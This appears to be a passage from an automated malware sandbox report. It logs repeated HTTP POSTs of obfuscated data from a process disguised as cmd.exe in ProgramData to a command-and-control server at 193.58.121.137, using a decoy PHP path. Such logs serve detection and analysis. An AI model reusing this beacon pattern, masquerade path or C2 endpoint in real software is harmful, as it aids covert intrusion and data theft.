                                                                                                                                  47192.168.2.449922193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:21.778984070 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:22.138236046 CET2560OUTData Raw: 5f 53 5c 5c 59 42 5a 5a 5a 5c 55 51 59 59 54 53 56 5f 5d 45 50 5d 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\\YBZZZ\UQYYTSV_]EP]Z]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?300%1%]&<?>.7U)7"U%.*3+Y:%=X7/T)-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:22.429534912 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:22.576776028 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:22 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  48192.168.2.449923193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:21.895337105 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:22.247587919 CET1884OUTData Raw: 5f 53 59 5e 59 43 5a 54 5a 5c 55 51 59 59 54 56 56 5c 5d 43 50 5d 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _SY^YCZTZ\UQYYTVV\]CP]ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@?']0>&'1+-T(4$.*>33Z,5)]#+'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:22.518940926 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:22.670315027 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:22 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 02 33 18 0e 50 27 16 2c 0c 33 3a 2a 19 2b 2f 37 41 39 21 38 5f 21 03 24 0a 2a 1d 3c 5a 3d 3c 23 03 22 01 36 51 21 01 29 11 3c 00 23 5b 03 1d 22 12 35 32 08 13 32 29 32 01 2c 30 02 43 25 2e 21 5e 2b 00 35 15 21 2e 25 0d 35 00 37 0f 2f 1d 3d 1f 30 02 0d 59 3f 3e 26 13 24 05 21 51 00 10 39 55 27 30 3a 06 25 3f 2d 06 31 03 39 59 30 35 30 00 22 3c 3a 51 25 2b 39 12 2c 1c 0a 56 26 31 2c 53 21 55 20 5c 3d 07 2d 13 31 3b 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: %3P',3:*+/7A9!8_!$*<Z=<#"6Q!)<#["522)2,0C%.!^+5!.%57/=0Y?>&$!Q9U'0:%?-19Y050"<:Q%+9,V&1,S!U \=-1;"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  49192.168.2.449929193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:22.723807096 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:23.075786114 CET2560OUTData Raw: 5a 51 59 5a 59 43 5a 56 5a 5c 55 51 59 5f 54 5b 56 5c 5d 45 50 50 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZQYZYCZVZ\UQY_T[V\]EPPZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(0')''-2/3+>;Q(4)2>*959 '?'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:23.364413977 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:23.492283106 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:23 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  50192.168.2.449935193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:23.627346039 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:23.988461018 CET2552OUTData Raw: 5f 5f 5c 5c 59 42 5f 55 5a 5c 55 51 59 5e 54 54 56 51 5d 46 50 55 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __\\YB_UZ\UQY^TTVQ]FPUZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?V/X3>:2-%<4<=+$Q2=>)#9547+'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:24.270412922 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:24.402657032 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:24 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  51192.168.2.449946193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:25.342700005 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:25.700766087 CET2560OUTData Raw: 5a 52 59 58 5c 46 5f 52 5a 5c 55 51 59 59 54 50 56 5d 5d 46 50 52 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZRYX\F_RZ\UQYYTPV]]FPRZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B+?_3==&7%+=8+>1.">:9#7;<='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:25.981708050 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:26.115055084 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:25 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  52192.168.2.449953193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:26.317024946 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:26.669524908 CET2560OUTData Raw: 5a 56 5c 5c 59 44 5a 52 5a 5c 55 51 59 57 54 55 56 59 5d 47 50 5c 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\\YDZRZ\UQYWTUVY]GP\ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+3?X0>'7[%? \>-7P('>%-S*[-!\"'/R+-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:26.992120981 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:27.129170895 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:26 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  53192.168.2.449963193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:27.688441992 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:28.044507980 CET2560OUTData Raw: 5f 51 5c 5f 59 45 5a 50 5a 5c 55 51 59 56 54 5b 56 5a 5d 49 50 51 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _Q\_YEZPZ\UQYVT[VZ]IPQZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)3?\02%%,\(=8?'!%>)>U/-&#U)='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:28.361604929 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:28.497051001 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:28 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  54192.168.2.449964193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:27.691878080 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1868
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:28.044543982 CET1868OUTData Raw: 5a 55 59 5a 59 42 5a 5b 5a 5c 55 51 59 5e 54 52 56 50 5d 40 50 5d 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZUYZYBZ[Z\UQY^TRVP]@P]Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?<':'7)\&<0Y<=<)'!1.) 3[,%^ ,<-'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:28.357605934 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:28.493041992 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:28 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 26 11 24 36 28 56 27 16 24 0a 24 2a 03 0a 2b 12 09 43 39 21 2c 58 36 3a 2c 0a 29 23 2c 5a 2a 3f 28 5b 22 2f 2a 56 35 11 29 5f 2a 3a 23 5b 03 1d 22 5a 35 31 3a 5b 27 39 0b 5b 2f 20 3c 43 26 2e 35 58 28 07 36 0f 23 00 3e 56 21 07 2b 0d 2c 23 0b 11 30 5a 34 07 2b 5b 3d 03 30 05 21 51 00 10 3a 0e 27 30 2a 05 25 3c 21 07 24 3d 22 00 33 25 30 01 35 02 0f 0b 31 28 22 03 3b 54 24 56 31 1c 3c 57 23 33 3f 03 3d 2a 25 13 32 3b 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: &$6(V'$$*+C9!,X6:,)#,Z*?(["/*V5)_*:#["Z51:['9[/ <C&.5X(6#>V!+,#0Z4+[=0!Q:'0*%<!$="3%051(";T$V1<W#3?=*%2;"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  55192.168.2.449970193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:28.629640102 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:28.981982946 CET2552OUTData Raw: 5f 53 5c 5a 59 42 5f 51 5a 5c 55 51 59 5e 54 52 56 5f 5d 40 50 57 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\ZYB_QZ\UQY^TRV_]@PWZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?0?'>'':2, Y? ?$Q2X)W*##^. 7)='_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:29.289935112 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:29.439449072 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:29 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  56192.168.2.449977193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:29.567708969 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:29.926165104 CET2560OUTData Raw: 5f 5e 59 5a 59 4a 5a 51 5a 5c 55 51 59 56 54 5b 56 5b 5d 43 50 51 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^YZYJZQZ\UQYVT[V[]CPQZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&<]&."%$9['<,]?>8+7>T&.&)#Z:%\#$+'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:30.210920095 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:30.340120077 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:30 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  57192.168.2.449983193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:30.483438969 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:30.841780901 CET2560OUTData Raw: 5f 51 5c 5e 59 45 5a 5b 5a 5c 55 51 59 59 54 5a 56 5e 5d 47 50 5c 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _Q\^YEZ[Z\UQYYTZV^]GP\ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B)0?3.&&7*&$[(?P?$"2%S*U/Z.: 43)='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:31.241086006 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:31.379453897 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:31 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  58192.168.2.449990193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:31.503844976 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:31.857456923 CET2560OUTData Raw: 5f 53 5c 53 59 40 5f 51 5a 5c 55 51 59 58 54 51 56 5c 5d 47 50 52 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\SY@_QZ\UQYXTQV\]GPRZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+?$6&',4]??W)4-&.*Z,5 Q;+='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:32.151712894 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:32.303177118 CET207INHTTP/1.1 200 OK
